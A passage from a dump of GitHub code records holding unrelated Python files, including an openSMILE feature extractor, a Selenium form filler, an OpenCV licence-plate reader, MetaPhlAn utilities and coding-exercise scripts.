dateNmonth(f.endDate) + \"</span><br>\")\n\t\t\telif line.strip() == \"{{year}}\":\n\t\t\t\tout.write(repr(year))\n\t\t\telse:\n\t\t\t\tout.write(line)\n\t\tout.close();\n\t\ttemplate.close();\n\n\tprint (len(days))\n\tprint(\"Writing calendar to an output file\")\n\ninitCalendar()\nreadFastings()\nreadForbiddenTimes()\nreadFastFreeTimes()\nreadSaints()\nreadCelebr()\nreadAdditional()\nreadConditions()\nfilterEntries()\napplyEntries()\ncleanup()\nwriteHtml()\nwriteCalendar()\n\n","repo_name":"mykhaylo-/church-calendar","sub_path":"gc_calendar.py","file_name":"gc_calendar.py","file_ext":"py","file_size_in_byte":14565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71705905193","text":"import opensmile\nimport csv\n\n# Créer une instance de l'objet Smile avec la configuration spécifique\nconfig = opensmile.FeatureSet.eGeMAPSv02\nfeature_level = opensmile.FeatureLevel.LowLevelDescriptors\n\nsmile = opensmile.Smile(\n feature_set=config,\n feature_level=feature_level,\n num_channels=1,\n)\n\n# Chemin vers le fichier audio que vous souhaitez traiter\naudio_file = \"C:\\\\Users\\\\lisar\\\\Downloads\\\\PAF_2023\\\\PAF_2023\\\\Dataset\\\\Interactions\\\\9\\\\person1.wav\"\n\n# Définir les noms des fonctionnalités que vous souhaitez extraire\nfeature_names = [\n \"frameIndex\",\n \"F0semitoneFrom27.5Hz_sma3nz_mean\",\n \"F0semitoneFrom27.5Hz_sma3nz_stddev\",\n \"F0semitoneFrom27.5Hz_sma3nz_minimum\",\n \"F0semitoneFrom27.5Hz_sma3nz_maximum\",\n \"F0semitoneFrom27.5Hz_sma3nz_range\",\n \"voiceProb_sma3nz_mean\",\n \"pcm_LOGenergy_sma3nz_mean\",\n \"pcm_fftMag_fband250-650_sma3_stddev\",\n \"pcm_zcr_sma3_stddev\",\n \"pcm_fftMag_spectralRollOff25.0_sma3_stddev\",\n \"pcm_fftMag_spectralCentroid_sma3_stddev\",\n]\n\n# Extraire les fonctionnalités spécifiées à partir du fichier audio\nfeatures = smile.process_file(audio_file, feature_names=feature_names)\n\n# Afficher les fonctionnalités extraites\nfor feature_name, feature_value in features.items():\n print(f\"{feature_name}: {feature_value}\")\n\n\n# Chemin vers le fichier CSV de sortie\noutput_file = \"C:\\\\Users\\\\lisar\\\\Documents\\\\paf.csv\"\n\n# Écrire les fonctionnalités extraites dans le fichier CSV\nwith open(output_file, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n \n # Écrire l'en-tête (noms des fonctionnalités)\n writer.writerow(features.keys())\n \n # Écrire les valeurs des fonctionnalités\n writer.writerow([value for value in features.values()])\n\nprint(\"Extraction terminée. Les résultats ont été enregistrés dans le fichier CSV.\")\n","repo_name":"lisarosilio/PAF-ConfianceHumainRobot","sub_path":"paf/featurespaf.py","file_name":"featurespaf.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73358891112","text":"'''\nGiven a list of land plots with their prices and a maximum budget.\n\nFind the size of largest contiguous plot of land you can purchase under the given budget\n\nExample:\n \n Input: [1, 1, 3, 2, 4, 3, 2], budget = 7\n Output: 4\n Why? [1, 1, 3, 2]\n\n'''\nimport queue\ndef maximum_budget(arr, budget):\n global_max = 0\n global_len = 0\n current_max = 0\n current_len = 0\n q = queue.Queue()\n for i in arr:\n if current_max + i <= budget:\n q.put(i)\n current_max += i\n current_len += 1\n else:\n if global_max < current_max:\n global_max = current_max\n #print(global_max)\n global_len = current_len\n current_max -= q.get()\n q.put(i)\n current_max += i\n return global_len\n\ndef max_budget(arr, budget):\n current_max = 0\n current_len = 0\n global_max = 0\n q = queue.Queue()\n for i in arr:\n if current_max + i <= budget:\n current_max += i\n current_len += 1\n q.put(i)\n else:\n global_max = current_max\n q.get()\n global_max += i\n current_max = global_max\n current_len -= 1\n return current_len\n\n\n\n#print(max_budget([1, 1, 3, 2, 4, 3, 2], budget = 7))\nprint(maximum_budget([5, 1, 1, 2, 1, 1, 2], budget = 7))\n\n\n ","repo_name":"Ashi-s/coding_problems","sub_path":"DevPost/sliding_window_max_budget.py","file_name":"sliding_window_max_budget.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32784363548","text":"puzzle_input = open(\"Day 11/puzzleinput.txt\").read().splitlines()\n\ndef CountAdjacent(grid,row,col,char):\n width = len(grid[0]) - 1\n height = len(grid) - 1\n count = 0\n if row > 0:\n count += (grid[row-1][col] == char)\n if row < height:\n count += (grid[row+1][col] == char)\n if col > 0:\n count += (grid[row][col-1] == char)\n if col < width:\n count += (grid[row][col+1] == char)\n if row > 0 and col > 0:\n count += (grid[row-1][col-1] == char)\n if row > 0 and col < width:\n count += (grid[row-1][col+1] == char)\n if row < height and col > 0:\n count += (grid[row+1][col-1] == char)\n if row < height and col < width:\n count += (grid[row+1][col+1] == char)\n return count\n\ndef CountVisible(grid,row,col):\n width = len(grid[0]) - 1\n height = len(grid) - 1\n count = 0\n directions = [(0,1),(1,1),(1,0),(1,-1),(0,-1),(-1,-1),(-1,0),(-1,1)]\n for delti,deltj in directions:\n row2 = row + delti\n col2 = col + deltj\n while (0 <= row2 <= height) and (0 <= col2 <= width):\n if grid[row2][col2] == \"L\":\n break\n if grid[row2][col2] == \"#\":\n count += 1\n break\n row2 += delti\n col2 += deltj\n return count\n\ndef UpdateSeats(grid):\n changes = 0\n newgrid = [\"\" for x in range(len(grid))]\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"L\" and CountVisible(grid,i,j) == 0:\n newgrid[i] += \"#\"\n changes += 1\n elif grid[i][j] == \"#\" and CountVisible(grid,i,j) >= 5:\n newgrid[i] += \"L\"\n changes += 1\n else:\n newgrid[i] += grid[i][j]\n if changes == 0:\n print(\"no changes!\")\n return False\n return newgrid\n\ngrid = puzzle_input\n\nwhile UpdateSeats(grid):\n grid = UpdateSeats(grid)\n\noccupied = 0\nfor row in grid:\n occupied += row.count(\"#\")\n\nprint(grid[0])\nprint(occupied)\n\n\n","repo_name":"Dwittyy/AdventOfCode","sub_path":"2020/Day 11/Day 11b.py","file_name":"Day 11b.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35161677945","text":"import json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver import ActionChains\n\nbrowser = webdriver.Firefox()\nbrowser.get(\"https://www.google.com\")\n#{id|id_name OR name|field_name : [type, value]}\nform_values = {\n # \"id|username\" : ['text' ,'brandon'],\n # \"id|password\" : ['text' ,'password'],\n \"name|q\" : ['text',\"hello world\"],\n \"name|btnK\" : ['submit']\n}\n \ndef fulfill_form(form_values):\n for field_id, value in form_values.items():\n \n type_label = field_id.split(\"|\")\n if len(type_label) == 2:\n if type_label[0].lower() == \"id\":\n elem = browser.find_element(By.ID, type_label[1])\n if value[0].lower() ==\"submit\":\n print(\"Submitting form!\")\n elem.click()\n elem.send_keys(value[-1] + Keys.RETURN)\n\n if type_label[0].lower() == \"name\":\n print(f\"going to {type_label[1]}!\")\n elem = browser.find_element(By.NAME, type_label[1])\n if value[0].lower() ==\"submit\":\n print(\"Submitting form!\")\n elem.click()\n elem.send_keys(value[-1] + Keys.RETURN)\n else:\n print(f\"there is something wrong with your value {field_id}, do id|id_name or name|field_name\")\n\n\ndef cli():\n form_values = {}\n more_form_values = True\n while more_form_values:\n _new_val = input(\"input new value EX 'id|id_value' OR 'name|name_value':\\n\")\n _form_type = input(\"what is the field type? \\n 1 : text, 2 : submit\")\n if form_type != \"1\" or form_type != \"2\":\n _form_type = input(\"what is the field type? \\n 1 : text, 2 : submit\")\n else:\n if form_type != \"2\":\n _form_value = input(\"what is the disired value?: \")\n form_type.append(_form_type)\n form_type.append(_form_value)\n else:\n form_type.append(_form_type)\n form_values[_new_val] = form_type\n _more_data = input(\"Do you have more to add?(y/n)\")\n more_form_values = True if _more_data == \"y\" else False\n fulfill_form(form_values)\n\n \ndef import_from_json(json_file):\n with open(json_file, \"r\") as jf:\n jfr = jf.read()\n form_values = json.loads(jfr)\n fulfill_form(form_values)\n","repo_name":"yothebob/auto-form-tester","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15215952024","text":"import sys\nimport cvlib\nimport numpy as np\nimport cv2 as cv\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom joblib import load\n\n\nkernel_cross = np.array([[ 0, 255, 0],\n [255, 255, 255],\n [ 0, 255, 0]], np.uint8)\n\n\n\ndef find_plate(input_filename, b = 1, dila = 1):\n \"\"\" Detecta la placa y regresa la ubicación y las dimensiones de la placa en la imagen. \n\n Args:\n - input_filename (str): path de la imagen de la cual se quiere obtener la imagen \n - b (int, optional): intensidad del blur que se le aplicará a la imagen. Defaults to 1.\n - dila (int, optional): intensidad de la dilatación que se aplicará a la imagen. Defaults to 1.\n\n Returns:\n - x (int): posición en x donde se encontró la placa \n - y (int): posición en y donde se contró la placa\n - w (int): ancho de la placa\n - h (int): alto de la placa \n\n Todo se devuelve en una tupla.\n \"\"\"\n \n print(\"---DETECCIÓN DE PLACA---\")\n # imagen a blanco y negro \n img_gray = cv.imread(input_filename, cv.IMREAD_GRAYSCALE)\n #cvlib.imgview(img_gray, title = \"Grayscale\")\n\n # imagen a color\n img_color = cv.imread(input_filename,cv.IMREAD_COLOR) \n img_color = cv.cvtColor(img_color,cv.COLOR_BGR2RGB)\n #cvlib.imgview(img_color, title= \"Color\")\n\n # Blur para imagenes \n img_blur = img_gray.copy()\n if b > 0: \n img_blur = cv.blur(img_gray,(b,b))\n t = \"Blur \" + str(b)\n \n\n # Binarizacion \n imgbin = cv.adaptiveThreshold(img_blur, 255,cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV,11,5)\n\n\n # Dilatacion\n dilateded = cv.dilate(imgbin, kernel_cross, iterations = dila)\n\n # Generador de contornos \n mode = cv.RETR_TREE \n method = [cv.CHAIN_APPROX_NONE, cv.CHAIN_APPROX_SIMPLE]\n contours, hierarchy = cv.findContours(dilateded, mode, method[1])\n\n # Impresion de todos los contornos\n color = (0,255,0) #(r,g,b)\n thickness = 2\n r1 = cv.cvtColor(imgbin.copy(),cv.COLOR_GRAY2RGB)\n for i in range(len(contours)):\n r1 = cv.drawContours(r1, contours, i, color, thickness)\n\n\n # Buqueda del contorno más cuadrado\n indice = 0\n extent_mayor = 0.0\n\n for i in range(len(contours)):\n cnt = contours[i]\n area = cv.contourArea(cnt)\n x,y,w,h = cv.boundingRect(cnt)\n rect_area = w*h\n extent = float(area)/rect_area\n\n area_imagen = img_gray.shape[0] * img_gray.shape[1]\n area_de_placa = area / area_imagen\n\n \n if w >= h:\n if (extent > extent_mayor): #and (len(contours_internos) > 1):\n indice = i\n extent_mayor = extent\n else:\n if (extent > extent_mayor) and (area_de_placa >= 0.04): #and (len(contours_internos) > 1):\n indice = i\n extent_mayor = extent\n\n # Impresión del contorno más ajutado\n index = indice\n color = (0,255,0) #(r,g,b)\n thickness = 2\n r3 = img_color.copy()\n r3 = cv.drawContours(r3, contours, index, color, thickness)\n\n\n\n # Area de la placa sobre área de la imagen \n area = cv.contourArea(contours[index])\n area_imagen = img_gray.shape[0] * img_gray.shape[1]\n area_de_placa = area / area_imagen\n \n # Corte de imagen\n x,y,w,h = cv.boundingRect(contours[index])\n\n\n print(\"Listo.\")\n return x, y, w, h\n\n\n\ndef find_numbers2(input_filename):\n \"\"\" Recibe el path de la placa obtiene la placa por medio de la función find_plate y obtiene los números de la placa con ayuda de una modelo \n\n Args:\n input_filename (str): path de la imagen de entrada\n\n return: \n resultado (str): string con los caracteres de la placa, si no se detecta nada regresa None. \n \"\"\"\n\n # PASOS: \n # - Detección de placas (LISTO)\n # - Lectura de las imágenes (LISTO)\n # - Detección de fondo claro o oscuro (LISTO)\n # -- Si el fondo es claro determinar si no es rojo\n # - Binarización dependiendo de si es claro o oscuro (LISTO)\n # - Determinación de tipo de placas: tipo 1 horizontal 1 línea, tipo 2 horizontal 2 líneas , tipo 3 vertical 2 líneas (LISTO)\n # - Obtención de contornos (LISTO)\n # - Filtro de contornos por sus proporciones (LISTO)\n # - Empaquetados de contornos en una función (LISTO)\n # - Determinar el orden de los números (LISTO)\n # - Recorte de los números y pasos a la función (LISTO)\n # - Detección de números en el modelo (LISTO)\n # - Impresión de la placa con los números (LISTO)\n # - Devolución de números (LISTO)\n\n # Deteccion de la placa\n x1, y1, w1, h1 = find_plate(input_filename, 1, 1)\n\n color = (0,255,0) \n\n print(\"\\n\\n---DETECCIÓN DE NUMEROS---\")\n # Lectura a color \n img_color = cv.imread(input_filename,cv.IMREAD_COLOR) \n img_color = cv.cvtColor(img_color,cv.COLOR_BGR2RGB)\n\n # Lectura en blaco y negro\n img_gray = cv.imread(input_filename, cv.IMREAD_GRAYSCALE)\n\n # Recorte - escala de grises\n img_re = img_gray[y1:y1+h1, x1:x1+w1]\n\n # Recorte - color\n img_re_color = img_color[y1:y1+h1, x1:x1+w1]\n\n\n # Binarización\n imgbin = img_re.copy()\n tresh = 91\n hold = 5\n\n imgbin = cv.adaptiveThreshold(img_re, 255,cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV,tresh, hold)\n\n # Histograma de binarización\n histr_imgbin = cv.calcHist([imgbin],None,None,[256],[0,256])\n\n if histr_imgbin[0][0] < histr_imgbin[255][0]:\n imgbin = 255 - imgbin\n \n\n # Opening - erosion seguido de dilatation\n kernel_cross = np.array([[ 0, 255, 0],\n [255, 255, 255],\n [ 0, 255, 0]], np.uint8)\n imgbin = cv.morphologyEx(imgbin, cv.MORPH_OPEN, kernel_cross)\n \n # Obtención de contornos\n mode = cv.RETR_TREE \n method = [cv.CHAIN_APPROX_NONE, cv.CHAIN_APPROX_SIMPLE]\n contours = cv.findContours(imgbin, mode, method[1])[0]\n\n\n\n # CALCULO DE PROPORCIÓN altura/ancho \n proporcion = float(h1 / w1)\n # print(\"Proporción (Altura/Ancho):\", float(proporcion)) \n\n\n # Información que se guardará de los números\n tipo = \"\" # tipo de placa \n lista_numeros = [] # lista de contornos\n lista_rec = [] # lista de imágenes recortadas y preporsedas para el modelo \n Xs = [] # Ubicación en X\n Ys = [] # Ubicación en Y\n Ws = [] # Ancho\n Hs = [] # Alto\n nivel = [] # Indica si el caracter se encuentra en primera o segundo línea\n\n # Imagen para graficar los contornos\n r2 = cv.cvtColor(imgbin.copy(),cv.COLOR_GRAY2RGB) \n \n\n # DETECCIÓN DE NÚMEROS POR TIPO DE PLACA \n # Tipos: tipo 1 (horizontal 1 línea), tipo 2 (horizontal 2 líneas) y tipo 3 ()\n padding = 6\n if proporcion <= 0.36:\n print(\"TIPO 1: horizonal 1 línea\")\n tipo = \"tipo1\"\n\n for cnt in contours: \n x,y,w,h = cv.boundingRect(cnt)\n\n proporcion_altura = float(h/h1)\n # proporcion_ancho = float(w/h)\n\n if (h > w) and (proporcion_altura >= 0.60) and (proporcion_altura <= 0.85) and (x > 0) and ((x+w) < (x1+w1)) : # and (proporcion_ancho > 0.2): # Si la altura es mayor al ancho se guarda el contorno\n \n # recorte del rectangulo\n rectangulo = imgbin[y:y+h, x:x+w]\n rectangulo = np.pad(rectangulo, padding, 'constant', constant_values = 0)\n rectangulo = 255 - rectangulo # Línea que se cambia con el modelo binarizado\n rectangulo = cv.resize(rectangulo, (75, 100))\n \n r2 = cv.rectangle(r2,(x,y),(x+w,y+h),(0,255,0),1)\n\n\n # Guardado de información del digito\n lista_numeros.append(cnt)\n lista_rec.append(rectangulo.flatten()) # El recorte se guarda como flaten\n Xs.append(x)\n Ys.append(y)\n Ws.append(w)\n Hs.append(h)\n\n # Clasificación de los digitos por línea \n if len(Ys) > 0:\n min_y = np.min(Ys)\n\n for i in Ys:\n if i < (min_y + 15): \n nivel.append(1)\n else: \n nivel.append(2)\n\n elif proporcion > 0.36 and proporcion < 1.0:\n print(\"TIPO 2: horizonal 2 líneas\")\n\n tipo = \"tipo2\"\n \n for cnt in contours: \n x,y,w,h = cv.boundingRect(cnt)\n\n proporcion_altura = float(h/h1)\n\n if (h > w) and (proporcion_altura >= 0.30) and (proporcion_altura <= 0.45) and (x > 0) and ((x+w) < (x1+w1)) : # and (proporcion_ancho > 0.2): # Si la altura es mayor al ancho se guarda el contorno\n \n\n # recorte del rectangulo\n rectangulo = imgbin[y:y+h, x:x+w]\n rectangulo = np.pad(rectangulo, padding, 'constant', constant_values = 0)\n rectangulo = 255 - rectangulo # Línea que se cambia con el modelo binarizado\n rectangulo = cv.resize(rectangulo, (75, 100))\n \n r2 = cv.rectangle(r2,(x,y),(x+w,y+h),(0,255,0),1)\n\n # Guardado de información del digito\n lista_numeros.append(cnt)\n lista_rec.append(rectangulo.flatten())\n Xs.append(x)\n Ys.append(y)\n Ws.append(w)\n Hs.append(h)\n\n # Clasificación de los digitos por línea \n if len(Ys) > 0:\n min_y = np.min(Ys)\n\n for i in Ys:\n if i < (min_y + 15): \n nivel.append(1)\n else: \n nivel.append(2)\n\n else: \n print(\"TIPO 3: vertival 2 líneas\")\n\n tipo = \"tipo3\"\n\n for cnt in contours: \n x,y,w,h = cv.boundingRect(cnt)\n\n proporcion_altura = float(h/h1)\n\n if (h > w) and (proporcion_altura >= 0.25) and (proporcion_altura <= 0.45) and (x > 0) and ((x+w) < (x1+w1)) : # and (proporcion_ancho > 0.2): # Si la altura es mayor al ancho se guarda el contorno\n\n \n # recorte del rectangulo\n rectangulo = imgbin[y:y+h, x:x+w]\n rectangulo = np.pad(rectangulo, padding, 'constant', constant_values = 0)\n rectangulo = 255 - rectangulo # Línea que se cambia con el modelo binarizado\n rectangulo = cv.resize(rectangulo, (75, 100))\n \n # Guardado de información del digito\n r2 = cv.rectangle(r2,(x,y),(x+w,y+h),(0,255,0),1)\n lista_numeros.append(cnt)\n lista_rec.append(rectangulo.flatten())\n Xs.append(x)\n Ys.append(y)\n Ws.append(w)\n Hs.append(h)\n\n \n # Clasificación de los digitos por línea \n if len(Ys) > 0:\n min_y = np.min(Ys)\n\n for i in Ys:\n if i < (min_y + 15): \n nivel.append(1)\n else: \n nivel.append(2)\n\n \n # Dataframe con los digitos de la placa \n numeros = pd.DataFrame({\n 'X': Xs,\n 'Y': Ys,\n 'W': Ws,\n 'H': Hs, \n 'Nivel': nivel, \n 'Contornos': lista_numeros, \n 'Rectangulos': lista_rec\n })\n\n\n\n\n # DETECCION DE DIGITOS\n if numeros.shape[0] > 0: # Si no se encontraron caracteres no se hará la predicción. \n lista = []\n lista2 = []\n\n if tipo == \"tipo1\":\n lista = numeros.sort_values(by=[\"X\", \"Y\"], ascending=True).to_numpy()\n lista2 = numeros.sort_values(by=[\"X\", \"Y\"], ascending=True)\n elif (tipo == \"tipo2\") or (tipo == \"tipo3\") :\n lista_ordenada = numeros.sort_values(by=[\"Nivel\",\"X\"], ascending=True).groupby('Nivel')\n \n lista = lista_ordenada.head(numeros.shape[0]).reset_index(drop=True).to_numpy()\n lista2 = lista_ordenada.head(numeros.shape[0]).reset_index(drop=True)\n\n\n # Impresión de orden de los digitos \n font = cv.FONT_HERSHEY_SIMPLEX\n fontScale = 1\n color = (0, 0, 255)\n thickness = 2\n\n for i in range(len(lista)): \n org = (lista[i][0]+4, lista[i][1])\n r2 = cv.putText(r2, str(i), org, font, \n fontScale, color, thickness, cv.LINE_AA)\n \n # PREDICCIÓN \n modelo = load('modelos/modelo.joblib') \n label = load('modelos/label_encoder.joblib')\n\n # Preparación del input\n numeros_input = lista2[[\"Rectangulos\"]].to_numpy()[:,0]\n numeros_ouput = modelo.predict(numeros_input.tolist())\n numeros_ouput = label.inverse_transform(numeros_ouput)\n\n # Eliminación de las primeras 2 letras I \n if len(numeros_ouput) > 2: \n if (numeros_ouput[0] == \"I\") and (numeros_ouput[1] == \"I\"):\n \n numeros_ouput = numeros_ouput[2:]\n\n lista2 = lista2.iloc[2:]\n \n\n print(\"Lista de dígitos:\", numeros_ouput)\n print(\"Digitos de la placa:\", \"\".join(numeros_ouput))\n\n\n # IMPRESIÓN DE LA IMAGEN FINAL \n thickness = 2\n color = (0,255,0) #(r,g,b)\n\n # PLACA \n imagen_final = img_color.copy()\n imagen_final = cv.rectangle(imagen_final,(x1,y1),(x1+w1,y1+h1),color,thickness)\n\n # DIGITOS\n for fila in lista2.to_numpy():\n x, y, w, h = fila[0:4]\n\n x = x + x1\n y = y + y1\n \n imagen_final = cv.rectangle(imagen_final,(x,y),(x+w,y+h),color,thickness)\n\n # TEXTO\n resultado = \"\".join(numeros_ouput)\n org = (x1, y1-4)\n imagen_final = cv.putText(imagen_final, resultado, org, font, \n fontScale, color, thickness, cv.LINE_AA)\n\n cvlib.imgview(imagen_final)\n\n print(\"\\n\\n\")\n\n return resultado\n \n else: \n color = (0,255,0) \n thickness = 2\n imagen_final = img_color.copy()\n imagen_final = cv.rectangle(imagen_final,(x1,y1),(x1+w1,y1+h1),color,thickness)\n cvlib.imgview(imagen_final)\n print(\"No se detectaron los dígitos\")\n\n print(\"\\n\\n\")\n return None\n \n\n\n\n# EJECUCIÓN\nargs = sys.argv\nbandera = \"--p\"\npath = \"fprint3.pgm\"\n\n\n# BANDERA\ntry:\n bandera = args[1]\n if bandera == \"--p\":\n pass\n else:\n print(f\"warning: {bandera} no es una argumento conocido del programa\")\n # print(\"en su lugar use '--p' para indicar el path.\")\n exit(0)\n\nexcept:\n print(\"usage: debe incluir '--p' para indicar la dirección del archivo.\")\n exit(0)\n\n\n# PATH \ntry:\n path = args[2]\nexcept:\n print(\"warning: debe indicar el path del archico a detectar.\")\n exit(0)\n\n\nprint(\"Filename:\", path)\n\n\nfind_numbers2(path)\n\nprint(\"--- FIN DEL PROGRAMA--\")\n# print(\"Output filename:\", output_filename)","repo_name":"CruzdelCid/Detector-de-Placas","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":14840,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1448117590","text":"#!/usr/bin/env python\n# Author: Duy Tin Truong (duytin.truong@unitn.it)\n#\t\tat CIBIO, University of Trento, Italy\n\n__author__ = 'Duy Tin Truong (duytin.truong@unitn.it)'\n__version__ = '0.1'\n__date__ = '1st Sep 2014'\n\nimport numpy\nimport sys\n\ndef dist2file(dist, labels, ofn):\n with open(ofn, 'w') as ofile:\n ofile.write('ID')\n for label in labels:\n ofile.write('\\t%s'%label)\n ofile.write('\\n')\n for i in range(len(labels)):\n ofile.write('%s\\t'%labels[i])\n for j in range(len(labels)):\n if j == len(labels) - 1:\n ofile.write('%f\\n'%dist[i][j])\n else:\n ofile.write('%f\\t'%dist[i][j])\n\n\n\ndef statistics(vals):\n vals = numpy.array(vals)\n result = {}\n if len(vals.shape) == 1:\n num_elems = len(vals)\n nrows = num_elems\n ncols = 1\n else:\n nrows, ncols = vals.shape\n num_elems = nrows * ncols\n if num_elems > 0:\n result['nrows'] = nrows\n result['ncols'] = ncols\n result['size'] = num_elems\n result['average'] = numpy.average(vals)\n result['min'] = numpy.min(vals)\n result['max'] = numpy.max(vals)\n result['median'] = numpy.percentile(vals, 50)\n result['percentile_25'] = numpy.percentile(vals, 25)\n result['percentile_75'] = numpy.percentile(vals, 75)\n else:\n result['nrows'] = nrows\n result['ncols'] = ncols\n result['size'] = num_elems\n result['average'] = 0\n result['min'] = 0\n result['max'] = 0\n result['median'] = 0\n result['percentile_25'] = 0\n result['percentile_75'] = 0\n\n str_result = ''\n for key in ['nrows',\n 'ncols',\n 'size',\n 'average',\n 'min',\n 'max',\n 'median',\n 'percentile_25',\n 'percentile_75']:\n str_result += '%s: %s\\n'%(key, result[key])\n\n return result, str_result\n\n\n\ndef dict2str(dict_var):\n result = ''\n for key in dict_var:\n result += '%s: %s\\n'%(key, dict_var[key])\n return result\n\n\ndef openr( fn, mode = \"r\" ):\n if fn is None:\n return sys.stdin\n return bz2.BZ2File(fn) if fn.endswith(\".bz2\") else open(fn,mode)\n \n\ndef openw( fn ):\n if fn is None:\n return sys.stdout\n return bz2.BZ2File(fn,\"w\") if fn.endswith(\".bz2\") else open(fn,\"w\")\n \n\ndef is_number(s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n","repo_name":"biobakery/MetaPhlAn2","sub_path":"strainphlan_src/mixed_utils.py","file_name":"mixed_utils.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"} +{"seq_id":"35804566336","text":"import requests\nimport aiohttp\nimport asyncio\n\n#普通方式\ndef download_image(url):\n print(\"开始下载:\" , url)\n #发送网络请求,下载图片\n response = requests.get(url)\n print(\"下载完成\")\n #图片保存到本地文件\n file_name = url.rsplit('_')[-1]\n with open(file_name,mode='wb')as file_object:\n file_object.write(response.content)\nif __name__=='__main__':\n url_list = [\n 'https://car2.autoimg.cn/cardfs/product/g28/M03/C4/13/1400x0_1_q95_autohomecar__ChxkmmOGyzCANKpyACu7-pKcLiQ979.jpg',\n 'https://car3.autoimg.cn/cardfs/product/g28/M04/98/CA/1400x0_1_q95_autohomecar__ChsFWWOArA6AcN2gACNPTqN6Hmc959.jpg',\n 'https://car2.autoimg.cn/cardfs/product/g30/M06/2D/DE/1400x0_1_q95_autohomecar__ChxknGJ7JuaAO2y6ACPujiLbiM0573.jpg']\n for item in url_list:\n download_image(item)\n \n ","repo_name":"Lancercxy/coroutine_asyncio_exercise","sub_path":"练习/2.实例练习_普通下载图片(同步).py","file_name":"2.实例练习_普通下载图片(同步).py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24304851397","text":"#Logistic Regression with a Neural Network mindset\r\nimport numpy as np\r\nimport copy\r\nimport matplotlib.pyplot as plt\r\nimport h5py\r\nimport scipy\r\nfrom PIL import Image\r\nfrom scipy import ndimage\r\nfrom lr_utils import load_dataset\r\nfrom public_tests import *\r\n######2 - Overview of the Problem set\r\n#### Problem Statement: You are given a dataset (\"data.h5\") containing:\r\n##- a training set of m_train images labeled as cat (y=1) or non-cat (y=0)\r\n\r\n##- a test set of m_test images labeled as cat or non-cat\r\n\r\n##- each image is of shape (num_px, num_px, 3) where 3 is for the 3 channels (RGB).\r\n## Thus, each image is square (height = num_px) and (width = num_px)\r\n\r\n# Loading the data (cat/non-cat)\r\ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\r\n# We added \"_orig\" at the end of image datasets (train and test) because we are going\r\n# to preprocess them. After preprocessing, we will end up with train_set_x and\r\n# test_set_x (the labels train_set_y and test_set_y don't need any preprocessing).\r\n\r\n# Each line of your train_set_x_orig and test_set_x_orig is an array representing an image.\r\n# You can visualize an example by running the following code. Feel free also to change the\r\n# index value and re-run to see other images.\r\n\r\n# Example of a picture\r\nindex = 25\r\nplt.imshow(train_set_x_orig[index])\r\nprint (\"y = \" + str(train_set_y[:, index]) + \", it's a '\" + classes[np.squeeze(train_set_y[:, index])].decode(\"utf-8\") + \"' picture.\")\r\nplt.show()\r\n# Many software bugs in deep learning come from having matrix/vector dimensions that don't\r\n# fit. If you can keep your matrix/vector dimensions straight you will go a long way toward\r\n# eliminating many bugs.\r\n\r\n\r\n# Find the values for:\r\n\r\n# - m_train (number of training examples)\r\n# - m_test (number of test examples)\r\n# - num_px (= height = width of a training image)\r\n\r\n#Remember that train_set_x_orig is a numpy-array of shape (m_train, num_px, num_px, 3).\r\n# For instance, you can access m_train by writing train_set_x_orig.shape[0]\r\n\r\n\r\n#(≈ 3 lines of code)\r\nm_train = train_set_x_orig.shape[0]\r\nm_test = test_set_x_orig.shape[0]\r\nnum_px = train_set_x_orig.shape[2]\r\n\r\n\r\nprint (\"Number of training examples: m_train = \" + str(m_train))\r\nprint (\"Number of testing examples: m_test = \" + str(m_test))\r\nprint (\"Height/Width of each image: num_px = \" + str(num_px))\r\nprint (\"Each image is of size: (\" + str(num_px) + \", \" + str(num_px) + \", 3)\")\r\nprint (\"train_set_x shape: \" + str(train_set_x_orig.shape))\r\nprint (\"train_set_y shape: \" + str(train_set_y.shape))\r\nprint (\"test_set_x shape: \" + str(test_set_x_orig.shape))\r\nprint (\"test_set_y shape: \" + str(test_set_y.shape))\r\n\r\n\r\n# For convenience, you should now reshape images of shape (num_px, num_px, 3) in a\r\n# numpy-array of shape (num_px ∗ num_px ∗ 3, 1). After this, our training (and test)\r\n# dataset is a numpy-array where each column represents a flattened image. There should\r\n# be m_train (respectively m_test) columns.\r\n\r\n# A trick when you want to flatten a matrix X of shape (a,b,c,d) to a matrix X_flatten of\r\n# shape (b ∗ c ∗ d, a) is to use:\r\n\r\n# X_flatten = X.reshape(X.shape[0], -1).T # X.T is the transpose of X\r\n\r\n# Reshape the training and test examples\r\ntrain_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T\r\ntest_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T\r\n\r\nprint (\"train_set_x_flatten shape: \" + str(train_set_x_flatten.shape))\r\nprint (\"train_set_y shape: \" + str(train_set_y.shape))\r\nprint (\"test_set_x_flatten shape: \" + str(test_set_x_flatten.shape))\r\nprint (\"test_set_y shape: \" + 